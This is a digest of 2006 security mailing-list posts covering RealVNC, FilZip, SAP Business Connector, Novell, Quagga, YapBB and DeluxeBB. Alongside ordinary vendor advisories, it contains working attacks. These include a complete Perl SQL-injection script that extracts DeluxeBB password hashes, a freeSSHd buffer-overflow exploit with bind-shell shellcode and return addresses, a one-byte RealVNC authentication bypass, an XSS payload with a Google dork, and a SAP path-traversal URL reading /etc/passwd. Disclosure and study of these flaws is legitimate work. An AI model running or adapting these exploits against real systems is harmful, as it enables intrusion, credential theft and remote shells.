appropriate authentication measures. There are several methods of authentication, including the standard DES Challenge-Response, as well as an option to disable authentication completely. Due to an incorrect implementation, clients are able to force the server to disable authentication, and allow login without a password. Technical details: 1) Server sends its version, RFB 003.008\n 2) Client replies with its version, RFB 003.008\n 3) Server sends 1 byte which is equal to the number of security types offered 3a) Server sends an array of bytes which indicate security types offered 4) Client replies with 1 byte, chosen from the array in 3a, to select the security type 5) The handshake, if requested, is performed, followed by from the server In RealVNC 4.1.1 and possibly prior versions which implement RFB 003.008 (though not RealVNC 4.0), the server does NOT perform a check to determine if the byte sent by the client in step 4 has actually been offered by the server in step 3a. In effect, authentication is moved from the server side to the client side. It is possible to force your client to simply request Type 1 - None as the security type, and gain access to the server without having to go through the time consuming and cumbersome password entry field. Here is a typical packet dump: Server - Client: 52 46 42 20 30 30 33 2e 30 30 38 0a - Server version Client - Server: 52 46 42 20 30 30 33 2e 30 30 38 0a - Client version Server - Client: 01 02 - One field follows... and that field is 02 (DES Challenge) Client - Server: 01 - Ahh, the lovely 1 byte exploit! Beautiful, isn't it? Server - Client: 00 00 00 00 -- Authenticated! Modifying the RealVNC client to exploit this is simple, and other clients can be modified as well. Such exercises, however, are best left to the skilled reader. To all admins, you are reminded to run services like these behind firewalls and through SSH tunnels. And now a very important message... RealVNC is distributed under the GNU General Public License. As such, the complete source code of RealVNC *must* be freely distributed. When RealVNC (the company) received notice of this flaw in their software, they were quite prompt in patching it. Such action is normally worthy of praise. Yet, in this case, RealVNC immediately took down the source code to their software. While this was probably done out of fear rather than malice, I believe it violates both the spirit and law of the GNU GPL. As we can see from the above, it is also not beneficial to security. I was able to rediscover this flaw using only binaries, and a little thought. Allowing for the benefit of doubt, I posted to the RealVNC mailing list, congratulating them on patching the bug so quickly and asking when the source code would be released. I received one reply from another user, agreeing that he would like to see the source, as it is under GPL. Upon returning the next day to check if there were any more replies, I was surprised to see the entire mailing list was deleted along with its archives. This is unfortunate, and it clearly neither prevents discussion nor promotes security. Best, James Evans
tyree[at]users.sourceforge.net
FYI A security beta has been released on SourceForge (http://sourceforge.net/projects/phpmyagenda) that addresses this issue. Regards, Tyree
Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability
== Secunia Research 15/05/2006 - FilZip unacev2.dll Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * FilZip version 3.04. Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in FilZip, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. The vulnerability is related to: SA16479 == 4) Solution Do not extract ACE archives from untrusted sources. == 5) Time Table 26/04/2006 - Initial vendor notification. 27/04/2006 - Second vendor notification. 11/05/2006 - Third vendor notification. 15/05/2006 - Public disclosure. (No reply from vendor) == 6) Credits Discovered by Secunia Research. == 7) References SA16479: http://secunia.com/advisories/16479/ The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2005-2856 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-30/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
CYBSEC - Security Advisory: Phishing Vector in SAP BC (Business Connector)
(The following advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Phishing_Vector_in_SAP_BC.pdf ) CYBSEC S.A. www.cybsec.com Advisory Name: Phishing Vector in SAP BC (Business Connector) Vulnerability Class: Phishing Vector / Improper Input Validation Release Date: 05/15/2006 Affected Applications: * SAP BC Core Fix 7 (and below) Affected Platforms: * Platform-Independent Local / Remote: Remote Severity: Low Author: Leandro Meiners. Vendor Status: * Confirmed, patch released. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Product Overview: = SAP Business Connector (SAP BC) is a middleware application based on B2B integration server from webMethods. It enables communication between SAP applications and SAP R/3 and non-SAP applications, by making all SAP functions accessible to business partners over the Internet as an XML-based service. The SAP Business Connector uses the Internet as a communication platform and XML or HTML as the data format. It integrates non-SAP products by using an open, non-proprietary technology. Vulnerability Description: == SAP BC was found to provide a vector to allow Phishing scams against the SAP BC administrator. Technical Details: == The parameter url of the page adapter-index.dsp allows absolute URLs, such as http://www.google.com. This can be used to mount a Phishing scam by sending a link like http://sapbc/WmRoot/adapter-index.dsp?url=http://www.attacker.com that if clicked by the administrator (while logged in, or logs in after clicking) will load the attacker's site webpage inside an HTML frame. Impact: === This can be used to mount a Phishing scam by sending a link, that if clicked by the administrator (while logged in, or logs in after clicking) will load the attacker's site webpage inside an HTML frame. Solutions: == SAP released a patch regarding this issue, which requires Server Core Fix 7. Details can be found in SAP note 908349. Vendor Response: * 12/06/2005: Initial Vendor Contact. * 12/07/2005: Technical details for the vulnerabilities sent to vendor. * 12/19/2005: Solutions provided by vendor for all vulnerabilities. * 02/15/2006: Coordinate release of pre-advisory without technical details. * 05/15/2006: Coordinate release of advisory with technical details. Contact Information: For more information regarding the vulnerability feel free to contact the author at lmeinersatcybsec.com. For more information regarding CYBSEC: www.cybsec.com Leandro Meiners CYBSEC S.A. Security Systems E-mail: [EMAIL PROTECTED] Tel/Fax: [54-11] 4382-1600 Web: http://www.cybsec.com PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeinersop=index signature.asc Description: This is a digitally signed message part
CYBSEC - Security Advisory: Arbitrary File Read/Delete in SAP BC (Business Connector)
(The following advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Arbitrary_File_Read_or_Delete_in_SAP_BC.pdf ) CYBSEC S.A. www.cybsec.com Advisory Name: Arbitrary File Read/Delete in SAP BC (Business Connector) Vulnerability Class: Improper Input Validation Release Date: 05/15/2006 Affected Applications: * SAP BC 4.6 * SAP BC 4.7 Affected Platforms: * Platform-Independent Local / Remote: Remote Severity: Medium Author: Leandro Meiners. Vendor Status: * Confirmed, patch released. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Product Overview: = SAP Business Connector (SAP BC) is a middleware application based on B2B integration server from webMethods. It enables communication between SAP applications and SAP R/3 and non-SAP applications, by making all SAP functions accessible to business partners over the Internet as an XML-based service. The SAP Business Connector uses the Internet as a communication platform and XML or HTML as the data format. It integrates non-SAP products by using an open, non-proprietary technology. Vulnerability Description: == SAP BC was found to allow reading and deleting any file from the file system to which the user that the SAP BC is running as had access. The vulnerability is present in the Monitoring functionality of the SAP Adapter. Technical Details: == When you view a log file (such as new_sap.log) the URL used is: http://sapbc/SAP/chopSAPLog.dsp?fullName=packages%2FSAP%2Flogs% 2Fnew_sap.log If the fullName parameter is changed to /etc/passwd (URL encoded) instead of SAP PATH/packages/SAP/logs/new_sap.log been viewed, the contents of the file /etc/passwd are presented to the user. As mentioned before any file on the File System to which the user that the SAP BC is running as has read access can be viewed. The following URL (designed to allow deletion of log files) allows deleting any file on the File System that the user the SAP BC is running as can delete. http://sapbc/invoke/sap.monitor.rfcTrace/deleteSingle?fullName=path_to_file Impact: === The Business Connector by default runs as a privileged user (administrator on the Windows platform and root on *NIX platforms), which allows ANY file on the File System to be read/deleted. According to the SAP Business Connector Security Best Practices, the following strategies are recommended for running the SAP BC in *NIX environments: 1. Running as non root user, using a high port. 2. Running as non root user, using a high port and port remapping to see the SAP BC in a restricted port. 3. Running the JVM setuid root. 4. Running SAP BC as root If either strategy (1) or (2) was taken the scope of the vulnerability was mitigated to allowing read/delete access to only the files owned by the user which the BC was running as. However, if (3) or (4) had been chosen ANY file on the File System could be read/deleted from the BC. Moreover, (3) allowed any user of the Operating System to obtain root since any Java program would be run with root privileges due to a SetUid Java Virtual Machine. The SAP Business Connector Security Best Practices has been corrected to recommend running the BC as a non-root user and using a high-numbered port or, if supported by the Operating System, giving the user privileges to open a specific port below 1024 to be used by the BC. Solutions: == SAP released a patch regarding this issue, for versions 4.6 and 4.7 of SAP BC. Details can be found in SAP note 906401. Vendor Response: * 12/06/2005: Initial Vendor Contact. * 12/07/2005: Technical details for the vulnerabilities sent to vendor. * 01/20/2006: Solution provided by vendor. * 02/15/2006: Coordinate release of pre-advisory without technical details. * 05/15/2006: Coordinate release of advisory with technical details. Contact Information: For more information regarding the vulnerability feel free to contact the author at lmeinersatcybsec.com. For more information regarding CYBSEC: www.cybsec.com Leandro Meiners CYBSEC S.A. Security Systems E-mail: [EMAIL PROTECTED] Tel/Fax: [54-11] 4382-1600 Web: http://www.cybsec.com PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeinersop=index signature.asc Description: This is a digitally signed message part
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
To share information about the new Release Notes document: this issue has been fixed in version 4.1.2 (Free Edition) http://www.realvnc.com/products/free/4.1/release-notes.html http://www.realvnc.com/download.html - Juha-Matti
Re: How secure is software X?
Fabian Becker [EMAIL PROTECTED] wrote on 05/12/2006 03:12:32 PM: Dear David in my opinion a software can either be secure or not secure. I think it's a bit like a woman cannot be a bit pregnant. But the protocol you are talking about can be used to tell the secure from the insecure pieces of software. By applying a test for these rules against systems, security will definitely be enhanced since software brandmarked with insecure will simply loose it's value. Another question is how to verify that authors check their own software? If they do not do it by now, why then? The only reason I could imagine would be a raise in value by beeing able to say My software is a tested 'secure' one. Hello Fabian, Respectfully, to classify security like that would be to condemn every software as insecure. What I see David proposing is more akin to how far along in her pregnancy. It is a measurement. Hopefully we can all agree that with large applications (eg. Oracle, WebSphere, Windows, etc...) there are bugs. While the desired direction may be 100% security (much like the desired personal goal is perfection), we need to be able to qualify how difficult it is to break applications in a standardized fashion. The one caveat I might bring up is the topic of false security. It is difficult to prove, in a standardized methodology, that an application is difficult to break; only that our methodology has failed to do so. How in-depth a fuzzing to we apply for this standard? Does the standard include significant levels of reverse engineering? If so, who does this (since some are more proficient than others)? If not, what true value does this standard prove, except that the application can withstand yet another script? In concept, I agree wholeheartedly that a security qualification could be beneficial. And perhaps, with all the brainpower involved, an relatively reliable automated method could be achieved. There are many details which would need to be sorted out. Some applications are more easily fuzzed than others... For example, SMTP servers have a pretty standard interface, they have to. Database servers do not, although they do have underlying language similarities. Web app servers, such as WebSphere and Oracle app server, may have commonalities, but have such a breadth of testing required to give any comprehensive qualification, to do so seems rather overwhelming. In my own little portable mind, such a standard would require an infrastructure of standards, with each class of application being represented and handled separately. One alternative proposition would be to provide a difficulty rating for the security researchers to apply to their vulnerability reports/analysis. Simply an appendage to our normal bugtraq traffic. Let the researchers grade the difficulty. Perhaps this would be problematic as well, since it would take me far longer to find a vuln in Oracle than it would for someone like David. But it would be a start. $0x02
Novell NDPS Remote Vulnerability (Server Client)
Summary: There's an integer overflow present that affects Novell Windows clients and Novell Netware server and Novell Open Enterprise server. Impact: Remote, unauthenticated, super-user privileges. Affected software: Novell Netware (All versions) Novell Open Enterprise Server (All NetWare based versions) Novell Netware Client for Windows (All versions) Credit: Ryan Smith Alex Wheeler Details Patch information: http://www.hustlelabs.com/novell_ndps_advisory.pdf Vendor links: http://www.novell.com/support/search.do?cmd=displayKCdocType=kcexternalId=9145sliceId=SAL_PublicdialogID=3455056stateId=0%200%203453353 http://www.novell.com/support/search.do?cmd=displayKCdocType=kcexternalId=1076sliceId=SAL_PublicdialogID=3455056stateId=0%200%203453353 License: This work is licensed under the Creative Commons Attribution 2.5 License. To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ or send a letter to Creative Commons, 543 Howard Street, 5th Floor, San Francisco, California, 94105, USA. Attribution should be provided both in the form of a link or reference to http://www.hustlelabs.com and a copy of the researchers' names listed under the Credit section of this document. All other trademarks and copyrights referenced in this document are the property of their respective owners.
Secunia Research: Abakt ZIP File Handling Buffer Overflow Vulnerability
== Secunia Research 15/05/2006 - Abakt ZIP File Handling Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Abakt version 0.9.2 and 0.9.3-beta1 Prior versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Abakt, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error when listing the contents of a ZIP archive. This can be exploited to cause a stack-based buffer overflow when a malicious ZIP archive containing a file with an overly long filename is opened. The vulnerability is related to: SA19945 Successful exploitation allows execution of arbitrary code but requires that the user is e.g. tricked into opening a malicious ZIP archive from within the Restore Zip Archive functionality. == 4) Solution The vulnerability has been fixed in 0.9.3-RC1. == 5) Time Table 12/05/2006 - Initial vendor notification. 15/05/2006 - Initial vendor reply. 15/05/2006 - Public disclosure. == 6) Credits Discovered by Tan Chew Keong, Secunia Research. == 7) References SA19945: http://secunia.com/advisories/19945/ The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-2161 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-31/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
[USN-284-1] Quagga vulnerabilities
=== Ubuntu Security Notice USN-284-1 May 15, 2006 quagga vulnerabilities CVE-2006-2223, CVE-2006-2224, CVE-2006-2276 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: quagga The problem can be corrected by upgrading the affected package to version 0.97.3-1ubuntu1.1 (for Ubuntu 5.04), or 0.99.1-1ubuntu1.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Paul Jakma discovered that Quagga's ripd daemon did not properly handle authentication of RIPv1 requests. If the RIPv1 protocol had been disabled, or authentication for RIPv2 had been enabled, ripd still replied to RIPv1 requests, which could lead to information disclosure. (CVE-2006-2223) Paul Jakma also noticed that ripd accepted unauthenticated RIPv1 response packets if RIPv2 was configured to require authentication and both protocols were allowed. A remote attacker could exploit this to inject arbitrary routes. (CVE-2006-2224) Fredrik Widell discovered that Quagga did not properly handle certain invalid 'sh ip bgp' commands. By sending special commands to Quagga, a remote attacker with telnet access to the Quagga server could exploit this to trigger an endless loop in the daemon (Denial of Service). (CVE-2006-2276) Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1.diff.gz Size/MD5:38413 eda4c03884896ba450f16ee70f8c082a http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1.dsc Size/MD5: 714 22a7196923c807617fcd995c01c340b1 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3.orig.tar.gz Size/MD5: 1964834 9015a5c61b22dc4e51b07fdc9bdadfd1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.97.3-1ubuntu1.1_all.deb Size/MD5: 477692 15527f6d3580a5327a31a6244cfc78f7 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_amd64.deb Size/MD5: 1345612 75b7044e62475f2b4b6bf4a2c682f681 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_i386.deb Size/MD5: 1124086 9ff534e9d6a717b340d448b486f5a8de powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_powerpc.deb Size/MD5: 1245250 acaa9feaf12f20e42407d25103b698bd Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1.diff.gz Size/MD5:27760 5577e4835dca7dce5d857ca843c43358 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1.dsc Size/MD5: 722 f2690f9ed75e966362870c591e4e5a72 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1.orig.tar.gz Size/MD5: 2107583 afd8c23a32050be76e55c28ec9dcff73 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.1-1ubuntu1.1_all.deb Size/MD5: 580362 af8e02b1ef292dc9e883a24b644d3e3f amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1_amd64.deb Size/MD5: 1418614 6d36f2bc13d16f87d8bed040dfdfcc0d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1_i386.deb Size/MD5: 1204568 39d90181e76908dabf23d4bee37c220e signature.asc Description: Digital signature
Confixx 3.1.2 = Code Injection
// Confixx 3.1.2 = Code Injection // - [~] Advisory by: LoK-Crew [-] Exploit: http://www.example.com/ftplogin/?login=;[XSS]div style= [-] Googledork: inurl:confixx inurl:login|anmeldung [+] Greetz to: Bluegeek [+] Visit: www.LoK-Crew.de
YapBB = 1.2 Beta2 'find.php' SQL Injection Vulnerability
Title : YapBB = 1.2 Beta2 'find.php' SQL Injection Vulnerability -- Author : x90c(Kyong Joo, Jung) Published : 2006.5.16 E-mail : geinblues [at] gmail.com Site : http://www.chollian.net/~jyj9782 -- 0x01 Summary YapBB is a OpenSource Web Forum written in php. (http://sourceforge.net/projects/yapbb) This web program is vulnerable to sql injection attack. So malicious attacker can get Every nicknames(id), passwords for this YapBB. Let's see the codes ~! 0x02 Testbed - Fedora Core 2 - MySQL-Server 5.0.19-log - Php5 ( magic_quotes_gpc = On ) 0x03 Codes ~/YapBB-1.2-Beta2/YapBB/find.php: - .. 34: $userBool = $HTTP_POST_VARS[choice]==user; // if choice == 'user' 36: $userpostBool = !empty($HTTP_GET_VARS[userID]); // userID == '[inject sql]' .. 119: else if ($userpostBool) 120: { 128:$postRes = $postQuery-select(SELECT p.date, t.id, t.description, u.nickname FROM . $cfgDatabase['post'] . AS p, . $cfgDatabase['topic'] . AS t, . $cfgDatabase['user'] . AS u WHERE t.id = p.topicid AND p.posterid = $userID AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50); // execute sql! - No words. I wrote a exploit for getting all YapBB user's nicknames and passwords. Sorry i can't put exploit in this advisory =) 0x04 Exploit [EMAIL PROTECTED] testbed]$ whoami x90c [EMAIL PROTECTED] testbed]$ 0x05 Patch ~/YapBB-1.2-Beta2/YapBB/find.php: .. 128: $postRes = $postQuery-select(SELECT p.date, t.id, t.description, u.nickname FROM . $cfgDatabase['post'] . AS p, . $cfgDatabase['topic'] . AS t, . $cfgDatabase['user'] . AS u WHERE t.id = p.topicid AND p.posterid = ' . addslashes($userID) . ' AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50); // x90c patch! .. Thanks! - Blu3h4t Team in korea
DeluxeBB 1.06 Remote SQL Injection Exploit
#!/usr/bin/perl use IO::Socket; print q{ # # DeluxeBB 1.06 Remote SQL Injection Exploit# # exploit discovered and coded# # by KingOfSka # # http://contropotere.netsons.org # # }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.somesite.com /forum/ 1 }; exit(); } $server = $ARGV[0]; $dir= $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print \r\n; print [] SERVER: $server\r\n; print []DIR: $dir\r\n; print [] USERID: $user\r\n; print \r\n\r\n; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= misc.php?sub=profilename=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='.$user ; print [~] PREPARE TO CONNECT...\r\n; $socket = IO::Socket::INET-new( Proto = tcp, PeerAddr = $server, PeerPort = 80) || die [-] CONNECTION FAILED; print [+] CONNECTED\r\n; print [~] SENDING QUERY...\r\n; print $socket GET $path HTTP/1.1\r\n; print $socket Host: $server\r\n; print $socket Accept: */*\r\n; print $socket Connection: close\r\n\r\n; print [+] DONE!\r\n\r\n; print --[ REPORT ]\r\n; while ($answer = $socket) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print Password Hash is: .$1.\r\n; print --\r\n; } exit(); } } print \r\n;
Re: [Full-disclosure] POC exploit for freeSSHd version 1.0.9
Also available in Metasploit framework: http://metasploit.com/projects/Framework/modules/exploits/freesshd_key_exchange.pm david maciejak Hi all, Attachment is the POC exploit for freeSSHd version 1.0.9 Advisories: http://www.securityfocus.com/bid/17958 http://www.frsirt.com/english/advisories/2006/1786 This was coded for the educational purpose. Regards, Tauqeer Ahmad __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com #!/usr/bin/env python Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0 ahmadtauqeer[at]yahoo.com Disclaimer: This Proof of concept exploit is for educational purpose only. Please do not use it against any system without prior permission. You are responsible for yourself for what you do with this code. Greetings: All the Pakistani White Hats including me ;) Flames:To all the skript kiddies out there. Man grow up!. Code tasted against freeSSHd version 1.0.9 If you didn't get shell at first try, try few times and you will get lucky Advisories: http://www.securityfocus.com/bid/17958 http://www.frsirt.com/english/advisories/2006/1786 import socket import getopt import sys host = 192.168.0.2 port = 0 eip = #/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */ shellcode = \xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45 \ \x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49 \ \x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d \ \x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66 \ \x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61 \ \xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40 \ \x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32 \ \x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6 \ \x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09 \ \xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0 \ \x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff \ \xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53 \ \x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff \ \xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64 \ \x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89 \ \xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab \ \xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51 \ \x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53 \ \xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6 \ \x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0 def exploit(): buff = \x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48 \ \x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00 \ \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde buff = buff + A * 1055 buff = buff + eip buff = buff + buff = buff + \x90 * 4 buff = buff + shellcode buff = buff + B * 19021 + \r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((host, port)) print + Recive reply from server: + sock.recv(1000) sock.send(buff) print + SSHD exploited. Now telnet to port 1977 to get shell print + if you didnt get shell in first try.Try again until you success sock.close() sock = None def usage(): print # print # CODED BY TAUQEER AHMAD # print # Scientist # print # print \n print Usage: %s -h hostip -p port -o OS % sys.argv[0] print Following OS supported\n print 1 Window XP SP1 print 2 Window XP SP2 print 3 Windows 2000 Advanced Server if __name__ == '__main__': if len(sys.argv) 7: usage() sys.exit() try: options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0] except getopt.GetoptError, err: print err usage() sys.exit() for option, value in options: if option == '-h': host = value if option == '-p': port = int(value) if option == '-o': if value == '1': eip = \xFC\x18\xD7\x77 # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1) elif value == '2': eip = \x0A\xAF\xD8\x77 # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2) elif value == '3': eip = \x4D\x3F\xE3\x77 # 77E33F4D
RE: Is MS06-018 a DoS or a system compromise ?
Hello Nick and people on the list I have seen 2 servers last month which have been hacked and actively used to scan TCP 3372 on foreign IPs There were servers which had port 3372 accessible (a firewall rule misconfiguration was making TCP ports 3000 accessible on the Internet) I was not able to find any tool which was used to hack the server on this port, but I think DTC was the culprit. These servers had also port 53 (DNS) accessible, they were running win2k with about 3 weeks of patch missing, no other services were on (no iis, server service turned off, on TCP/IP binded on NIC, ...) I found tools on the hacked servers : infoscan.exe 1.0 from uhhuhy (cnhonker.com), and dfind.exe from class101.org, and log files of recent scans which were corresponding to the complaints the server's owner received. The tools were placed in recycler directory, the hacker seems to have been able to send commands or get a remote shell. I'd be interested to hear information about remote code execution on this port if you find some, these details make me think a serious problem exists in DTC service. Thanks and have a nice day Maxime Ducharme -Message d'origine- De : Nick Boyce [mailto:[EMAIL PROTECTED] Envoyé : 13 mai, 2006 20:25 À : bugtraq@securityfocus.com Objet : Is MS06-018 a DoS or a system compromise ? There seems to be some confusion in MS Security Bulletin MS06-018, Vulnerability in Microsoft Distributed Transaction Coordinator. The bulletin itself (http://www.microsoft.com/technet/security/bulletin/ms06-018.mspx) states : An attacker could cause the Microsoft Distributed Transaction Coordinator (MSDTC) to stop responding. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests. whereas the linked download pages for both the Win2K and WinXP patches http://www.microsoft.com/downloads/details.aspx?familyid=8B98F380-0E5C-4B80- 9710-95E1B35AFD83displaylang=en http://www.microsoft.com/downloads/details.aspx?familyid=D80B43B2-727B-46B6- 82D1-F2CBD916FE32displaylang=en state : A security issue has been identified in the Microsoft Distributed Transaction Controller service that could allow an attacker to compromise your Windows-based system and gain control over it. The related McAfee advisory (http://seclists.org/lists/bugtraq/2006/May/0215.html) states : Exploitation can at most lead to a denial of service and therefore the risk factor is at medium. so I guess DoS is what it is ... but it would still be nice if someone in the know could confirm the download pages are wrong anyone from Microsoft here ? Cheers Nick Boyce -- One way to make your old car run better is to look up the price of a new model.